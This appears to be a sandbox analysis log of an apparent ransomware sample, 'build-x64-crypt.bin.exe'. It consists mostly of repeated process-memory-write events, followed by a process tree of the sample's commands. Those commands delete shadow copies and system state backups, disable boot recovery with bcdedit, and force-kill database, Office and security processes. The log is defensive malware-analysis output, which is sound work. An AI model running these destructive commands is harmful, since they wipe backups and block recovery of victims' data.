PID 764 wrote to memory of 1600	764	cmd.exe	171
PID 764 wrote to memory of 1600	764	cmd.exe	171
PID 1304 wrote to memory of 1636	1304	build-x64-crypt.bin.exe	172
PID 1304 wrote to memory of 1636	1304	build-x64-crypt.bin.exe	172
PID 1304 wrote to memory of 1636	1304	build-x64-crypt.bin.exe	172
PID 1636 wrote to memory of 1968	1636	cmd.exe	174
PID 1636 wrote to memory of 1968	1636	cmd.exe	174
PID 1636 wrote to memory of 1968	1636	cmd.exe	174
PID 1304 wrote to memory of 1632	1304	build-x64-crypt.bin.exe	175
PID 1304 wrote to memory of 1632	1304	build-x64-crypt.bin.exe	175
PID 1304 wrote to memory of 1632	1304	build-x64-crypt.bin.exe	175
PID 1632 wrote to memory of 1092	1632	cmd.exe	177
PID 1632 wrote to memory of 1092	1632	cmd.exe	177
PID 1632 wrote to memory of 1092	1632	cmd.exe	177
PID 1304 wrote to memory of 1932	1304	build-x64-crypt.bin.exe	178
PID 1304 wrote to memory of 1932	1304	build-x64-crypt.bin.exe	178
PID 1304 wrote to memory of 1932	1304	build-x64-crypt.bin.exe	178
PID 1932 wrote to memory of 1492	1932	cmd.exe	180
PID 1932 wrote to memory of 1492	1932	cmd.exe	180
PID 1932 wrote to memory of 1492	1932	cmd.exe	180
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	181
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	181
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	181
PID 2024 wrote to memory of 2020	2024	cmd.exe	183
PID 2024 wrote to memory of 2020	2024	cmd.exe	183
PID 2024 wrote to memory of 2020	2024	cmd.exe	183
PID 1304 wrote to memory of 1156	1304	build-x64-crypt.bin.exe	184
PID 1304 wrote to memory of 1156	1304	build-x64-crypt.bin.exe	184
PID 1304 wrote to memory of 1156	1304	build-x64-crypt.bin.exe	184
PID 1156 wrote to memory of 1936	1156	cmd.exe	186
PID 1156 wrote to memory of 1936	1156	cmd.exe	186
PID 1156 wrote to memory of 1936	1156	cmd.exe	186
PID 1304 wrote to memory of 236	1304	build-x64-crypt.bin.exe	187
PID 1304 wrote to memory of 236	1304	build-x64-crypt.bin.exe	187
PID 1304 wrote to memory of 236	1304	build-x64-crypt.bin.exe	187
PID 236 wrote to memory of 1736	236	cmd.exe	189
PID 236 wrote to memory of 1736	236	cmd.exe	189
PID 236 wrote to memory of 1736	236	cmd.exe	189
PID 1304 wrote to memory of 480	1304	build-x64-crypt.bin.exe	190
PID 1304 wrote to memory of 480	1304	build-x64-crypt.bin.exe	190
PID 1304 wrote to memory of 480	1304	build-x64-crypt.bin.exe	190
PID 480 wrote to memory of 1016	480	cmd.exe	192
PID 480 wrote to memory of 1016	480	cmd.exe	192
PID 480 wrote to memory of 1016	480	cmd.exe	192
PID 1304 wrote to memory of 208	1304	build-x64-crypt.bin.exe	193
PID 1304 wrote to memory of 208	1304	build-x64-crypt.bin.exe	193
PID 1304 wrote to memory of 208	1304	build-x64-crypt.bin.exe	193
PID 208 wrote to memory of 1032	208	cmd.exe	195
PID 208 wrote to memory of 1032	208	cmd.exe	195
PID 208 wrote to memory of 1032	208	cmd.exe	195
PID 1304 wrote to memory of 1000	1304	build-x64-crypt.bin.exe	196
PID 1304 wrote to memory of 1000	1304	build-x64-crypt.bin.exe	196
PID 1304 wrote to memory of 1000	1304	build-x64-crypt.bin.exe	196
PID 1000 wrote to memory of 1560	1000	cmd.exe	198
PID 1000 wrote to memory of 1560	1000	cmd.exe	198
PID 1000 wrote to memory of 1560	1000	cmd.exe	198
PID 1304 wrote to memory of 1864	1304	build-x64-crypt.bin.exe	199
PID 1304 wrote to memory of 1864	1304	build-x64-crypt.bin.exe	199
PID 1304 wrote to memory of 1864	1304	build-x64-crypt.bin.exe	199
PID 1864 wrote to memory of 1908	1864	cmd.exe	201
PID 1864 wrote to memory of 1908	1864	cmd.exe	201
PID 1864 wrote to memory of 1908	1864	cmd.exe	201
PID 1304 wrote to memory of 1628	1304	build-x64-crypt.bin.exe	202
PID 1304 wrote to memory of 1628	1304	build-x64-crypt.bin.exe	202
PID 1304 wrote to memory of 1628	1304	build-x64-crypt.bin.exe	202
PID 1628 wrote to memory of 1956	1628	cmd.exe	204
PID 1628 wrote to memory of 1956	1628	cmd.exe	204
PID 1628 wrote to memory of 1956	1628	cmd.exe	204
PID 1304 wrote to memory of 1972	1304	build-x64-crypt.bin.exe	205
PID 1304 wrote to memory of 1972	1304	build-x64-crypt.bin.exe	205
PID 1304 wrote to memory of 1972	1304	build-x64-crypt.bin.exe	205
PID 1972 wrote to memory of 1256	1972	cmd.exe	207
PID 1972 wrote to memory of 1256	1972	cmd.exe	207
PID 1972 wrote to memory of 1256	1972	cmd.exe	207
PID 1304 wrote to memory of 1140	1304	build-x64-crypt.bin.exe	208
PID 1304 wrote to memory of 1140	1304	build-x64-crypt.bin.exe	208
PID 1304 wrote to memory of 1140	1304	build-x64-crypt.bin.exe	208
PID 1140 wrote to memory of 1976	1140	cmd.exe	210
PID 1140 wrote to memory of 1976	1140	cmd.exe	210
PID 1140 wrote to memory of 1976	1140	cmd.exe	210
PID 1304 wrote to memory of 1492	1304	build-x64-crypt.bin.exe	211
PID 1304 wrote to memory of 1492	1304	build-x64-crypt.bin.exe	211
PID 1304 wrote to memory of 1492	1304	build-x64-crypt.bin.exe	211
PID 1492 wrote to memory of 1476	1492	cmd.exe	213
PID 1492 wrote to memory of 1476	1492	cmd.exe	213
PID 1492 wrote to memory of 1476	1492	cmd.exe	213
PID 1304 wrote to memory of 2020	1304	build-x64-crypt.bin.exe	214
PID 1304 wrote to memory of 2020	1304	build-x64-crypt.bin.exe	214
PID 1304 wrote to memory of 2020	1304	build-x64-crypt.bin.exe	214
PID 2020 wrote to memory of 1160	2020	cmd.exe	216
PID 2020 wrote to memory of 1160	2020	cmd.exe	216
PID 2020 wrote to memory of 1160	2020	cmd.exe	216
PID 1304 wrote to memory of 1936	1304	build-x64-crypt.bin.exe	217
PID 1304 wrote to memory of 1936	1304	build-x64-crypt.bin.exe	217
PID 1304 wrote to memory of 1936	1304	build-x64-crypt.bin.exe	217
PID 1936 wrote to memory of 1608	1936	cmd.exe	219
PID 1936 wrote to memory of 1608	1936	cmd.exe	219
PID 1936 wrote to memory of 1608	1936	cmd.exe	219
PID 1304 wrote to memory of 1736	1304	build-x64-crypt.bin.exe	220
PID 1304 wrote to memory of 1736	1304	build-x64-crypt.bin.exe	220
PID 1304 wrote to memory of 1736	1304	build-x64-crypt.bin.exe	220
PID 1736 wrote to memory of 204	1736	cmd.exe	222
PID 1736 wrote to memory of 204	1736	cmd.exe	222
PID 1736 wrote to memory of 204	1736	cmd.exe	222
PID 1304 wrote to memory of 1016	1304	build-x64-crypt.bin.exe	223
PID 1304 wrote to memory of 1016	1304	build-x64-crypt.bin.exe	223
PID 1304 wrote to memory of 1016	1304	build-x64-crypt.bin.exe	223
PID 1016 wrote to memory of 220	1016	cmd.exe	225
PID 1016 wrote to memory of 220	1016	cmd.exe	225
PID 1016 wrote to memory of 220	1016	cmd.exe	225
PID 1304 wrote to memory of 1032	1304	build-x64-crypt.bin.exe	226
PID 1304 wrote to memory of 1032	1304	build-x64-crypt.bin.exe	226
PID 1304 wrote to memory of 1032	1304	build-x64-crypt.bin.exe	226
PID 1032 wrote to memory of 1840	1032	cmd.exe	228
PID 1032 wrote to memory of 1840	1032	cmd.exe	228
PID 1032 wrote to memory of 1840	1032	cmd.exe	228
PID 1304 wrote to memory of 1560	1304	build-x64-crypt.bin.exe	229
PID 1304 wrote to memory of 1560	1304	build-x64-crypt.bin.exe	229
PID 1304 wrote to memory of 1560	1304	build-x64-crypt.bin.exe	229
PID 1560 wrote to memory of 1740	1560	cmd.exe	231
PID 1560 wrote to memory of 1740	1560	cmd.exe	231
PID 1560 wrote to memory of 1740	1560	cmd.exe	231
PID 1304 wrote to memory of 1908	1304	build-x64-crypt.bin.exe	232
PID 1304 wrote to memory of 1908	1304	build-x64-crypt.bin.exe	232
PID 1304 wrote to memory of 1908	1304	build-x64-crypt.bin.exe	232
PID 1908 wrote to memory of 1076	1908	cmd.exe	234
PID 1908 wrote to memory of 1076	1908	cmd.exe	234
PID 1908 wrote to memory of 1076	1908	cmd.exe	234
PID 1304 wrote to memory of 1956	1304	build-x64-crypt.bin.exe	235
PID 1304 wrote to memory of 1956	1304	build-x64-crypt.bin.exe	235
PID 1304 wrote to memory of 1956	1304	build-x64-crypt.bin.exe	235
PID 1956 wrote to memory of 1580	1956	cmd.exe	237
PID 1956 wrote to memory of 1580	1956	cmd.exe	237
PID 1956 wrote to memory of 1580	1956	cmd.exe	237
PID 1304 wrote to memory of 1256	1304	build-x64-crypt.bin.exe	238
PID 1304 wrote to memory of 1256	1304	build-x64-crypt.bin.exe	238
PID 1304 wrote to memory of 1256	1304	build-x64-crypt.bin.exe	238
PID 1256 wrote to memory of 1584	1256	cmd.exe	240
PID 1256 wrote to memory of 1584	1256	cmd.exe	240
PID 1256 wrote to memory of 1584	1256	cmd.exe	240
PID 1304 wrote to memory of 1976	1304	build-x64-crypt.bin.exe	241
PID 1304 wrote to memory of 1976	1304	build-x64-crypt.bin.exe	241
PID 1304 wrote to memory of 1976	1304	build-x64-crypt.bin.exe	241
PID 1976 wrote to memory of 1928	1976	cmd.exe	243
PID 1976 wrote to memory of 1928	1976	cmd.exe	243
PID 1976 wrote to memory of 1928	1976	cmd.exe	243
PID 1304 wrote to memory of 1476	1304	build-x64-crypt.bin.exe	244
PID 1304 wrote to memory of 1476	1304	build-x64-crypt.bin.exe	244
PID 1304 wrote to memory of 1476	1304	build-x64-crypt.bin.exe	244
PID 1476 wrote to memory of 1984	1476	cmd.exe	246
PID 1476 wrote to memory of 1984	1476	cmd.exe	246
PID 1476 wrote to memory of 1984	1476	cmd.exe	246
PID 1304 wrote to memory of 1160	1304	build-x64-crypt.bin.exe	247
PID 1304 wrote to memory of 1160	1304	build-x64-crypt.bin.exe	247
PID 1304 wrote to memory of 1160	1304	build-x64-crypt.bin.exe	247
PID 1160 wrote to memory of 1768	1160	cmd.exe	249
PID 1160 wrote to memory of 1768	1160	cmd.exe	249
PID 1160 wrote to memory of 1768	1160	cmd.exe	249
PID 1304 wrote to memory of 1608	1304	build-x64-crypt.bin.exe	250
PID 1304 wrote to memory of 1608	1304	build-x64-crypt.bin.exe	250
PID 1304 wrote to memory of 1608	1304	build-x64-crypt.bin.exe	250
PID 1608 wrote to memory of 236	1608	cmd.exe	252
PID 1608 wrote to memory of 236	1608	cmd.exe	252
PID 1608 wrote to memory of 236	1608	cmd.exe	252
PID 1304 wrote to memory of 204	1304	build-x64-crypt.bin.exe	253
PID 1304 wrote to memory of 204	1304	build-x64-crypt.bin.exe	253
PID 1304 wrote to memory of 204	1304	build-x64-crypt.bin.exe	253
PID 204 wrote to memory of 480	204	cmd.exe	255
PID 204 wrote to memory of 480	204	cmd.exe	255
PID 204 wrote to memory of 480	204	cmd.exe	255
PID 1304 wrote to memory of 220	1304	build-x64-crypt.bin.exe	256
PID 1304 wrote to memory of 220	1304	build-x64-crypt.bin.exe	256
PID 1304 wrote to memory of 220	1304	build-x64-crypt.bin.exe	256
PID 220 wrote to memory of 216	220	cmd.exe	258
PID 220 wrote to memory of 216	220	cmd.exe	258
PID 220 wrote to memory of 216	220	cmd.exe	258
PID 1304 wrote to memory of 1840	1304	build-x64-crypt.bin.exe	259
PID 1304 wrote to memory of 1840	1304	build-x64-crypt.bin.exe	259
PID 1304 wrote to memory of 1840	1304	build-x64-crypt.bin.exe	259
PID 1840 wrote to memory of 1484	1840	cmd.exe	261
PID 1840 wrote to memory of 1484	1840	cmd.exe	261
PID 1840 wrote to memory of 1484	1840	cmd.exe	261
PID 1304 wrote to memory of 1740	1304	build-x64-crypt.bin.exe	262
PID 1304 wrote to memory of 1740	1304	build-x64-crypt.bin.exe	262
PID 1304 wrote to memory of 1740	1304	build-x64-crypt.bin.exe	262
PID 1740 wrote to memory of 1792	1740	cmd.exe	264
PID 1740 wrote to memory of 1792	1740	cmd.exe	264
PID 1740 wrote to memory of 1792	1740	cmd.exe	264
PID 1304 wrote to memory of 1076	1304	build-x64-crypt.bin.exe	265
PID 1304 wrote to memory of 1076	1304	build-x64-crypt.bin.exe	265
PID 1304 wrote to memory of 1076	1304	build-x64-crypt.bin.exe	265
PID 1076 wrote to memory of 572	1076	cmd.exe	267
PID 1076 wrote to memory of 572	1076	cmd.exe	267
PID 1076 wrote to memory of 572	1076	cmd.exe	267
PID 1304 wrote to memory of 1580	1304	build-x64-crypt.bin.exe	268
PID 1304 wrote to memory of 1580	1304	build-x64-crypt.bin.exe	268
PID 1304 wrote to memory of 1580	1304	build-x64-crypt.bin.exe	268
PID 1580 wrote to memory of 1520	1580	cmd.exe	270
PID 1580 wrote to memory of 1520	1580	cmd.exe	270
PID 1580 wrote to memory of 1520	1580	cmd.exe	270
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	271
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	271
PID 1304 wrote to memory of 1584	1304	build-x64-crypt.bin.exe	271
PID 1584 wrote to memory of 1700	1584	cmd.exe	273
PID 1584 wrote to memory of 1700	1584	cmd.exe	273
PID 1584 wrote to memory of 1700	1584	cmd.exe	273
PID 1304 wrote to memory of 1928	1304	build-x64-crypt.bin.exe	274
PID 1304 wrote to memory of 1928	1304	build-x64-crypt.bin.exe	274
PID 1304 wrote to memory of 1928	1304	build-x64-crypt.bin.exe	274
PID 1928 wrote to memory of 1488	1928	cmd.exe	276
PID 1928 wrote to memory of 1488	1928	cmd.exe	276
PID 1928 wrote to memory of 1488	1928	cmd.exe	276
PID 1304 wrote to memory of 1984	1304	build-x64-crypt.bin.exe	277
PID 1304 wrote to memory of 1984	1304	build-x64-crypt.bin.exe	277
PID 1304 wrote to memory of 1984	1304	build-x64-crypt.bin.exe	277
PID 1984 wrote to memory of 1572	1984	cmd.exe	279
PID 1984 wrote to memory of 1572	1984	cmd.exe	279
PID 1984 wrote to memory of 1572	1984	cmd.exe	279
PID 1304 wrote to memory of 1768	1304	build-x64-crypt.bin.exe	280
PID 1304 wrote to memory of 1768	1304	build-x64-crypt.bin.exe	280
PID 1304 wrote to memory of 1768	1304	build-x64-crypt.bin.exe	280
PID 1768 wrote to memory of 1384	1768	cmd.exe	282
PID 1768 wrote to memory of 1384	1768	cmd.exe	282
PID 1768 wrote to memory of 1384	1768	cmd.exe	282
PID 1304 wrote to memory of 236	1304	build-x64-crypt.bin.exe	283
PID 1304 wrote to memory of 236	1304	build-x64-crypt.bin.exe	283
PID 1304 wrote to memory of 236	1304	build-x64-crypt.bin.exe	283
PID 236 wrote to memory of 1736	236	cmd.exe	285
PID 236 wrote to memory of 1736	236	cmd.exe	285
PID 236 wrote to memory of 1736	236	cmd.exe	285
PID 1304 wrote to memory of 480	1304	build-x64-crypt.bin.exe	286
PID 1304 wrote to memory of 480	1304	build-x64-crypt.bin.exe	286
PID 1304 wrote to memory of 480	1304	build-x64-crypt.bin.exe	286
PID 480 wrote to memory of 1016	480	cmd.exe	288
PID 480 wrote to memory of 1016	480	cmd.exe	288
PID 480 wrote to memory of 1016	480	cmd.exe	288
PID 1304 wrote to memory of 216	1304	build-x64-crypt.bin.exe	289
PID 1304 wrote to memory of 216	1304	build-x64-crypt.bin.exe	289
PID 1304 wrote to memory of 216	1304	build-x64-crypt.bin.exe	289
PID 216 wrote to memory of 1508	216	cmd.exe	291
PID 216 wrote to memory of 1508	216	cmd.exe	291
PID 216 wrote to memory of 1508	216	cmd.exe	291
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	292
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	292
PID 1304 wrote to memory of 1484	1304	build-x64-crypt.bin.exe	292
PID 1484 wrote to memory of 1796	1484	cmd.exe	294
PID 1484 wrote to memory of 1796	1484	cmd.exe	294
PID 1484 wrote to memory of 1796	1484	cmd.exe	294
PID 1304 wrote to memory of 1792	1304	build-x64-crypt.bin.exe	295
PID 1304 wrote to memory of 1792	1304	build-x64-crypt.bin.exe	295
PID 1304 wrote to memory of 1792	1304	build-x64-crypt.bin.exe	295
PID 1792 wrote to memory of 1908	1792	cmd.exe	297
PID 1792 wrote to memory of 1908	1792	cmd.exe	297
PID 1792 wrote to memory of 1908	1792	cmd.exe	297
PID 1304 wrote to memory of 1628	1304	build-x64-crypt.bin.exe	298
PID 1304 wrote to memory of 1628	1304	build-x64-crypt.bin.exe	298
PID 1304 wrote to memory of 1628	1304	build-x64-crypt.bin.exe	298
PID 1628 wrote to memory of 1868	1628	cmd.exe	300
PID 1628 wrote to memory of 1868	1628	cmd.exe	300
PID 1628 wrote to memory of 1868	1628	cmd.exe	300
PID 1304 wrote to memory of 320	1304	build-x64-crypt.bin.exe	301
PID 1304 wrote to memory of 320	1304	build-x64-crypt.bin.exe	301
PID 1304 wrote to memory of 320	1304	build-x64-crypt.bin.exe	301
PID 320 wrote to memory of 1816	320	cmd.exe	303
PID 320 wrote to memory of 1816	320	cmd.exe	303
PID 320 wrote to memory of 1816	320	cmd.exe	303
PID 1304 wrote to memory of 1620	1304	build-x64-crypt.bin.exe	304
PID 1304 wrote to memory of 1620	1304	build-x64-crypt.bin.exe	304
PID 1304 wrote to memory of 1620	1304	build-x64-crypt.bin.exe	304
PID 1620 wrote to memory of 792	1620	cmd.exe	306
PID 1620 wrote to memory of 792	1620	cmd.exe	306
PID 1620 wrote to memory of 792	1620	cmd.exe	306
PID 1304 wrote to memory of 1808	1304	build-x64-crypt.bin.exe	307
PID 1304 wrote to memory of 1808	1304	build-x64-crypt.bin.exe	307
PID 1304 wrote to memory of 1808	1304	build-x64-crypt.bin.exe	307
PID 1808 wrote to memory of 1776	1808	cmd.exe	309
PID 1808 wrote to memory of 1776	1808	cmd.exe	309
PID 1808 wrote to memory of 1776	1808	cmd.exe	309
PID 1304 wrote to memory of 864	1304	build-x64-crypt.bin.exe	310
PID 1304 wrote to memory of 864	1304	build-x64-crypt.bin.exe	310
PID 1304 wrote to memory of 864	1304	build-x64-crypt.bin.exe	310
PID 864 wrote to memory of 784	864	cmd.exe	312
PID 864 wrote to memory of 784	864	cmd.exe	312
PID 864 wrote to memory of 784	864	cmd.exe	312
PID 1304 wrote to memory of 1320	1304	build-x64-crypt.bin.exe	313
PID 1304 wrote to memory of 1320	1304	build-x64-crypt.bin.exe	313
PID 1304 wrote to memory of 1320	1304	build-x64-crypt.bin.exe	313
PID 1320 wrote to memory of 1824	1320	cmd.exe	315
PID 1320 wrote to memory of 1824	1320	cmd.exe	315
PID 1320 wrote to memory of 1824	1320	cmd.exe	315
PID 1304 wrote to memory of 1556	1304	build-x64-crypt.bin.exe	316
PID 1304 wrote to memory of 1556	1304	build-x64-crypt.bin.exe	316
PID 1304 wrote to memory of 1556	1304	build-x64-crypt.bin.exe	316
PID 1556 wrote to memory of 1388	1556	cmd.exe	318
PID 1556 wrote to memory of 1388	1556	cmd.exe	318
PID 1556 wrote to memory of 1388	1556	cmd.exe	318
PID 1304 wrote to memory of 1920	1304	build-x64-crypt.bin.exe	319
PID 1304 wrote to memory of 1920	1304	build-x64-crypt.bin.exe	319
PID 1304 wrote to memory of 1920	1304	build-x64-crypt.bin.exe	319
PID 1920 wrote to memory of 208	1920	cmd.exe	321
PID 1920 wrote to memory of 208	1920	cmd.exe	321
PID 1920 wrote to memory of 208	1920	cmd.exe	321
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	326
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	326
PID 1304 wrote to memory of 2024	1304	build-x64-crypt.bin.exe	326
PID 1304 wrote to memory of 632	1304	build-x64-crypt.bin.exe	330
PID 1304 wrote to memory of 632	1304	build-x64-crypt.bin.exe	330
PID 1304 wrote to memory of 632	1304	build-x64-crypt.bin.exe	330
PID 632 wrote to memory of 832	632	cmd.exe	332
PID 632 wrote to memory of 832	632	cmd.exe	332
PID 632 wrote to memory of 832	632	cmd.exe	332

C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe
"C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1304
- C:\Windows\system32\cmd.exe
  cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY DELETE /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1000
- C:\Windows\system32\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Windows\system32\wbadmin.exe
    wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    - Deletes System State backups
    - Drops file in Windows directory
    PID:1840
- C:\Windows\system32\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\system32\wbadmin.exe
    wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
    3⤵
    - Deletes System State backups
    - Drops file in Windows directory
    PID:572
- C:\Windows\system32\cmd.exe
  cmd /C bcdedit.exe /set {default} recoveryenabled No
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1320
- - C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1412
- C:\Windows\system32\cmd.exe
  cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1636
- C:\Windows\system32\cmd.exe
  cmd /C vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1632
- C:\Windows\system32\cmd.exe
  cmd /C C:\Windows\system32\vssvc.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\system32\VSSVC.exe
    C:\Windows\system32\vssvc.exe
    3⤵
    PID:1884
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wxServer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wxServer*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBFCService*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBFCService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBVSS*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:836
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBVSS*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sql*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1388
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM msaccess*
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msaccess*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:220
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM mssql*
  2⤵
  PID:784
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mssql*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM mysql*
  2⤵
  PID:1780
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mysql*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wxServerView*
  2⤵
  PID:572
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wxServerView*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:632
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM sqlmangr*
  2⤵
  PID:1212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlmangr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM RAgui*
  2⤵
  PID:1552
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM RAgui*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM supervise*
  2⤵
  PID:1884
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM supervise*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Culture*
  2⤵
  PID:1976
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Culture*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM Defwatch*
  2⤵
  PID:852
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Defwatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1260
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM winword*
  2⤵
  PID:1404
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM winword*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBW32*
  2⤵
  PID:1388
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBW32*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:212
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgr*
  2⤵
  PID:220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBDBMgr*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1000
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM qbupdate*
  2⤵
  PID:1484
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM qbupdate*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1836
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM axlbridge*
  2⤵
  PID:1740
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM axlbridge*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:764
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM httpd*
  2⤵
  PID:632
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM httpd*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fdlauncher*
  2⤵
  PID:1520
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fdlauncher*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1632
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM MsDtSrvr*
  2⤵
  PID:1584
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MsDtSrvr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM java*
  2⤵
  PID:1928
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM java*
    3⤵
    - Kills process with taskkill
    PID:1948
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM 360se*
  2⤵
  PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM 360se*
    3⤵
    - Kills process with taskkill
    PID:1940
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM 360doctor*
  2⤵
  PID:1260
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM 360doctor*
    3⤵
    PID:324
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM wdswfsafe*
  2⤵
  PID:1400
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wdswfsafe*
    3⤵
    - Kills process with taskkill
    PID:1536
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM fdhost*
  2⤵
  PID:212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fdhost*
    3⤵
    - Kills process with taskkill
    PID:1808
- C:\Windows\system32\cmd.exe
  cmd /C taskkill /F /T /IM GDscan*
  2⤵
  PID:1000
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM GDscan*
